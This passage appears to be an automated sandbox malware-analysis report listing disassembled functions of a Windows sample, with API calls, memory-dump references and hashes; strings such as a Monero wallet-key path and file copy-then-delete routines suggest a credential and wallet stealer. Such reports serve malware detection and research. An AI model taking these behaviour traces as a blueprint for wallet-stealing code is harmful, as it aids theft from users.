                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: e97ead5e7b8e5c5f946044054e6248dc391366d725a46a261b17437c2feb0e94
                        • Instruction ID: 0731d00b12998d42cc7ac864f171ca59f9a48c1b7274ed78383d030b823ca91f
                        • Opcode Fuzzy Hash: e97ead5e7b8e5c5f946044054e6248dc391366d725a46a261b17437c2feb0e94
                        • Instruction Fuzzy Hash: 0F119EB1A44205EBD700CFD4DD5AFBBFBB8EB44B10F20415AFA05A7290EB7959008BE1
                        Function 009A9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                        Download Yara Rule
                        APIs
                        • StrStrA.SHLWAPI(015BDA70,?,?,?,009A140C,?,015BDA70,00000000), ref: 009A926C
                        • lstrcpyn.KERNEL32(00BDAB88,015BDA70,015BDA70,?,009A140C,?,015BDA70), ref: 009A9290
                        • lstrlen.KERNEL32(?,?,009A140C,?,015BDA70), ref: 009A92A7
                        • wsprintfA.USER32 ref: 009A92C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: 1d0ae940b670e18cbd874cab7d57b8d97b0e8d821b60d80579ea839d297a3100
                        • Instruction ID: 69055de4f63ef8f9b09e7e1e44a72756588fb26d33f44ca7238a5826efd1908e
                        • Opcode Fuzzy Hash: 1d0ae940b670e18cbd874cab7d57b8d97b0e8d821b60d80579ea839d297a3100
                        • Instruction Fuzzy Hash: AD01C875501108FFCB08DFECC998EAEBBB9EB48354F108589F9099B344DA31AA41DB91
                        Function 009912A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009912B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009912BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009912D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009912F5
                        • RegCloseKey.ADVAPI32(?), ref: 009912FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: fa6782c575f5238bf1376d88c55e2d814a4a34104d962df83e8652f4fc527c69
                        • Instruction ID: 439fc048513b3b26836ac52abdf9decd8f585b92f9b06de7cb00cbab4b75c837
                        • Opcode Fuzzy Hash: fa6782c575f5238bf1376d88c55e2d814a4a34104d962df83e8652f4fc527c69
                        • Instruction Fuzzy Hash: F901E1B9A40208BBDB04DFE4DC59FAEB7BCEB48701F10815AFE1597280EA759A019F51
                        Function 009A6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 009A6663
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 009A6726
                        • ExitProcess.KERNEL32 ref: 009A6755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: 8cc221d64327165576eab00f06b1b9abf9a0d710b9b20de8621e1f3b35413daf
                        • Instruction ID: 8f6824d6c116df24a779cd906b997aa28837a6cbb4b4e12ed0a831a5fc00f654
                        • Opcode Fuzzy Hash: 8cc221d64327165576eab00f06b1b9abf9a0d710b9b20de8621e1f3b35413daf
                        • Instruction Fuzzy Hash: D93130B1D01218ABDB54EB90DC95FDEB778AF84300F404189F20967191EF746B48CF9A
                        Function 009A87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,009B0E28,00000000,?), ref: 009A882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A8836
                        • wsprintfA.USER32 ref: 009A8850
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: dccfbc6c081a6e405db5f708d84ce0ee5f2e0e5ec7887f3683e8f580f2d250fa
                        • Instruction ID: 539e389eec8d749fbf74a3a21f2bbbf703ff0c152f4fa4a029167adce2a33e43
                        • Opcode Fuzzy Hash: dccfbc6c081a6e405db5f708d84ce0ee5f2e0e5ec7887f3683e8f580f2d250fa
                        • Instruction Fuzzy Hash: 822142B1A41204EFDB04DF94DD55FAEFBB8FB48711F104119FA05A7280DB79A901CBA1
                        Function 009A8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009A951E,00000000), ref: 009A8D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A8D62
                        • wsprintfW.USER32 ref: 009A8D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: f9b48ded75c57233c0b45fbdd6a481b69fd735fa12c59ed8332dae143e100bd2
                        • Instruction ID: fada64993a8549b96086e316fe445040b8fc5525de7f1330759a122f3e496b69
                        • Opcode Fuzzy Hash: f9b48ded75c57233c0b45fbdd6a481b69fd735fa12c59ed8332dae143e100bd2
                        • Instruction Fuzzy Hash: 72E0ECB5A41208BBD710DF94DD1AE69BBB8EB84702F004195FD0997290EE729E109B96
                        Function 0099A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009A8B60: GetSystemTime.KERNEL32(009B0E1A,015B9A38,009B05AE,?,?,009913F9,?,0000001A,009B0E1A,00000000,?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009A8B86
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0099A2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 0099A3FF
                        • lstrlen.KERNEL32(00000000), ref: 0099A6BC
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 0099A743
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: f10ae5c48406392c331b45eb34bf04710f0de57d71b7fb25b13cfa3e143d2892
                        • Instruction ID: 2c0a95181929becb6c8a7ee32f924febb62a1d084f8cc07fd9239264d31401bc
                        • Opcode Fuzzy Hash: f10ae5c48406392c331b45eb34bf04710f0de57d71b7fb25b13cfa3e143d2892
                        • Instruction Fuzzy Hash: 64E1EF728101089BDB49FBA8DC96FEEB33CAF95300F508159F51772091EF346A49CBA6
                        Function 0099D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009A8B60: GetSystemTime.KERNEL32(009B0E1A,015B9A38,009B05AE,?,?,009913F9,?,0000001A,009B0E1A,00000000,?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009A8B86
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0099D481
                        • lstrlen.KERNEL32(00000000), ref: 0099D698
                        • lstrlen.KERNEL32(00000000), ref: 0099D6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 0099D72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 596ad688391008576ffb4d023b3f5211fe83d9fc3c821118e44f3c184ef29571
                        • Instruction ID: 57c11160c2c4845e69a412ca6a7a115a834cc6b39772dfae83e318716e880af7
                        • Opcode Fuzzy Hash: 596ad688391008576ffb4d023b3f5211fe83d9fc3c821118e44f3c184ef29571
                        • Instruction Fuzzy Hash: 3C9112729101089BDB44FBA4DDA6FEEB339AF95300F504169F507A7091EF346A09CBE6
                        Function 0099D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009A8B60: GetSystemTime.KERNEL32(009B0E1A,015B9A38,009B05AE,?,?,009913F9,?,0000001A,009B0E1A,00000000,?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009A8B86
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0099D801
                        • lstrlen.KERNEL32(00000000), ref: 0099D99F
                        • lstrlen.KERNEL32(00000000), ref: 0099D9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 0099DA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 420828950780e151af4b51056b574ed03b157de15d371e8e08d6a0a5c4f2a4f6
                        • Instruction ID: 1b1f0c9bd41868c2c0d3ccd59c4b958cb96604ed756f7fff8c0ee2e9bc76fcb1
                        • Opcode Fuzzy Hash: 420828950780e151af4b51056b574ed03b157de15d371e8e08d6a0a5c4f2a4f6
                        • Instruction Fuzzy Hash: E681E2729101089BDB44FBA4DDA6FEEB339AF95300F504519F507A70A1EF346A09CBE6
                        Function 009A3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: d40787ce4319c2c06216e3780a1262abdc9eacba541d86e19c7287eb8ca2c2e2
                        • Instruction ID: ef754d0bb1d277df0fb334c6b9dc7d90274c764841ed0ecfaa2f94d100900980
                        • Opcode Fuzzy Hash: d40787ce4319c2c06216e3780a1262abdc9eacba541d86e19c7287eb8ca2c2e2
                        • Instruction Fuzzy Hash: 80411E71D10109AFCB04EFA4D996AFEB778AF95304F108418F41667291EB75AA05CFE1
                        Function 00999CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009999EC
                          • Part of subcall function 009999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00999A11
